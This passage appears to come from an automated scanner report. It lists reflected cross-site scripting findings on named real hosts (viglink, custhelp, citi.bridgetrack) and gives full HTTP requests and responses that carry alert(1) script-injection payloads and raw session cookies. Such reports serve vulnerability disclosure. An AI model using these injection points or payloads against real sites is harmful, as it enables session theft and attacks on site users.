Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 4b46b<script>alert(1)</script>e43aee83162 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966856066450 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 22:26:57 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 97

error: Unknown api key: 4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162

3.10. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e41</script><script>alert(1)</script>a2217655438 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438= HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:42:03 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUx6oW8tRuC50eDPRl97npFuaGOMHZn11NBeN10rkeSZPQgfvVRx_vSuEVGvGk0mz1YIl66klbzDAz4DZ182Z1g2kuAlaPwudchWaGV0lrblKY0vtyrTDDdJ79GQdJGzc8AyEa7pPjYaY2Zu0yuUACJsF%7EJtE%7EioMbnns6N4y50a8cshftqy6qCLau3o8Zwemiu0KpfY0iRiilrQMFwJWssTx%7EYINE1554YiykSPZP7F0IBDazYu6U3ycZMVMfr0QLbP5KPEGQ_vEeZLeda09%7EVPWRykFc8y_ukjAbGNAMFht1JGBgjah0G2TUgQ0nSW75STNcK4H4AQoYJV7UCGSR79sTFZIQONMSPahHDaYJfXgZKzZxTmdV_GJ8hU5tlHR04ytmnxPNqwFRehwSL0RTPnZG3thL%7EVHjHZV56Eb_V85eqHkXObQD0Zm0p10961KoojryKWDSFgzM2niBSNac0fLu7K4LulL54z_WGQJduoFwvteqHRIwoYdAobOou2EW%7ExQ4oFScfPE%21; path=/; httponly
RNT-Time: D=118859 t=1296697323108634
RNT-Machine: 01
F5_do_compression: yes
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEMO
...[SNIP]...

3.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa72</script><script>alert(1)</script>2ea59d67104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1 HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:08 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUgRprfxgIlvq96duxnob3hvBaWfagsAGz590%7E%7EFQxYvj6_1w_6mEciwlljmE7zfJtLqRlvR8xervxxoGDYYqCbw4kPUBcZEFoZRmrZw8QTqh4Q3urBb47qoF3Tui%7EDMuuA8SW6x111R8MaPvDpqWLDXbH2fjE%7EjAQJy%7EjpssYasVZ6HH79id9iSiVkOhJWhsMfM4PF1Frjy3wyBiwGBVx8ENPxA2o1dJ0ebJPuv5%7EJLSu504MoxpXxUSQUXU%7EseRXqvR9FJr7oB15DwsOl4WjzTn0NPd0rGO3Fas0MnPCVz9jhd8VYKFNvqPkw9jFjGI5RxmfMPs1cmyuG3nobRb1T%7EEeNs7LFMydaVYBQOOEVJ6jaF1Re9n%7EAnssEQJc50mpLkTRawP6ipl92XTouSftSuWnhiHv2QavJLs2kQPIo4CwPpvMympk9qYSFcWtVh1AzWTOSuaIE967DBi4q0x4h7xmtPl28r4A2IvoxYQCn8Q6%7E7%7EmD%7E3OVgp4HNwqM%7EBqbGGyF1_k2hY%21; path=/; httponly
RNT-Time: D=104396 t=1296697268034941
RNT-Machine: 06
F5_do_compression: yes
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEM
...[SNIP]...

3.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of the nsextt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547e6</script><script>alert(1)</script>cf48e18b39c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:09 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUwXGkB0Q%7EkeN19jaCuImlCbnetW3JO6vRIsg9G5758NlYVaItvU5XjD2ZiX_NiVtKaJDalprrVLj6qlLlDnCI6%7Ejjft3YUnrhb1XA3YpbzwIDJ2F2nssc9F%7E_hnpNzWrw2Dt6CUNXAlY07awZQXpFjnrQoevYbR6hnrOq3wMaN9CfgNv1vGgvLQihsfZk4%7EXk_O9C4jhvJQaDoSUVbklHFGqWJ8Ap%7EA2lWYLgQn7Dj7wu5qJSZymKIh2kaAalN_A3S_oJHJCb%7EeyuIvKrxyUp17gHHKbPNbbV6LCP%7E_JdHcR19nH3J2LrLihYSYy9OqJzfMyriuylyjc%21; path=/; httponly
RNT-Time: D=114429 t=1296697269254262
RNT-Machine: 04
F5_do_compression: yes
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 27211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c');
RightNow.Url.setSession('L3RpbWUvMTI5NjY5NzI2OS9zaWQvakxsSzhGbGs=');
RightNow.Event.setNoSessionCookies(true);
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHE
...[SNIP]...

3.13. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 607f7<script>alert(1)</script>42eba27e39e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000002)%3C/script%3E607f7<script>alert(1)</script>42eba27e39e HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:10 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUAaKWBZ7SvvLxWfp%7EcIQfh7mPnrXi9vTZtK7WkhczqL64yYHQ0QVbkK9RHgawNIjpSCmM0Aeaz122bTrt9oxrYqquIIWDHxoUwafbHRYXpZAj8zBo%7EGLua8qDJQ%7EDYr_BEjDeAjfYtPNjYUGrMUjxkR8PpaOpu3f89vemdlgHGnpoJdFLQxsk675FBV9YqReWb3GFGXX4XBah%7EsnYmD_7SyBdqQzd3Zhql7OBAN1jNOgrekoiQBj_XTw6WLuYQmIdNS_1rGasg88i67O%7E9NukjSidUHv2Jl6I7jQxN%7EqKfSPkOD4ngpoXsEKphUlebl6j_XbSJbRExJ716aGgyN_ZtzCyzQ80dbPwgc7f72dHNu4lA3QTPUPqrVQ5_GsqIpIuQPssVxGn6wl0x3yl1rK6szqG50WB0gAY0_rSruLJlE4Xu%7EmXXJ1_cw%21%21; path=/; httponly
RNT-Time: D=108020 t=1296697270345051
RNT-Machine: 03
F5_do_compression: yes
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 27261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
</script>607f7<script>alert(1)</script>42eba27e39e');
RightNow.Url.setSession('L3RpbWUvMTI5NjY5NzI3MC9zaWQva3l6SzhGbGs=');
RightNow.Event.setNoSessionCookies(true);
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHE
...[SNIP]...

3.14. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b76</script><script>alert(1)</script>ea583b6f0d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:43 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUgQICmvl2w6Zo2Xi_Jx0N0VgOcbGCC8QFItCAw06VgCz3Mt4%7EGAGfyU2M%7EjB2xMg5ggHpohXV5l5rqv0jWjfN%7EJ%7E72QklUZuENaYBg1WZ4GK77t_VnZJ9ePgqpdt5qpmFeuVSPOvtFdMPJ16uULvibY1%7EVSLYegwJMunUEB4cMQWgeozPB1RX4bpdRmJfNGNYSMipIi5%7ELSfhHdeViZe0S5UhkGq95Iv1vFhIT1B7QKMrn3gv7A%7EiAr7QuieTdfnGa4tw8OQ1cUu8geqVTV4DvFNfsS4YL%7E4vTYnBb8lxnsVeT%7EC5MhQgL0Boz096TdGlDBIUF18UGjd55MRhW9CHmDXXNObd_wZ%7E; path=/; httponly
Content-Length: 25622
RNT-Time: D=131773 t=1296691423739902
RNT-Machine: 07
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT
...[SNIP]...

3.15. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c521</script><a>a4238952955 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:48 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUl5Nj4RPJmKrK0ec4KoYcZ74WET9xduFZF8XJhcIYWFDJvt8YVPg5PiixPRy5Sn%7Ehiidpu8t9H6PgtJWmiJjeDFhqdz2g4M6rZvKVoR3cwoU%7EA3cXzprLyv6lvudmE_MqxYdg0wnBtp0VjGBkouhpp2g8RrZCMvI7C8uRKHyHdrhjYuH3jeP_vuoouEl7b4xlfWmNRvdchpWhQ9wzT4Bz4fIiibRbgmiM; path=/; httponly
Content-Length: 25600
RNT-Time: D=113558 t=1296691428704362
RNT-Machine: 03
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEMO
...[SNIP]...

3.16. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f27fe%3balert(1)//63b819cf766 was submitted in the BT_PID parameter. This input was echoed as f27fe;alert(1)//63b819cf766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=285777f27fe%3balert(1)//63b819cf766&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 22:01:37 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ATV1=43499dU6T3Hc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701370249&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ASB1=TX=1296684097&Pb=0&A=8&SID=077E13A179464CC6B65ADCF24D55BF62&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=2B636B63D42641EFBEA212DDAB2EF869; path=/
Date: Wed, 02 Feb 2011 22:01:37 GMT
Connection: close
Content-Length: 2725

var bt_ad_content285777f27fe;alert(1)//63b819cf766=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack.com.edgesuite.net/asset
...[SNIP]...

3.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc3b"%3balert(1)//132759f788 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9dc3b";alert(1)//132759f788 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com&9dc3b"%3balert(1)//132759f788=1 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 22:01:48 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB9=TX=1296684109&Pb=0&A=8&SID=DD8583ED0D2F43239CBC136CC3E1C6DE&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79292&Cr=98462&W=41062&Tr=41062&Cp=4112&P=285777&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701480650&S2=98462z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ATV9=33820dU6T3Tc1c40Gc8N2Hccc304Uc2DDScc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=4E30CB4C3E0A4790B2D6A833F5FD8992; path=/
Date: Wed, 02 Feb 2011 22:01:47 GMT
Connection: close
Content-Length: 2739

var bt_ad_content285777=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
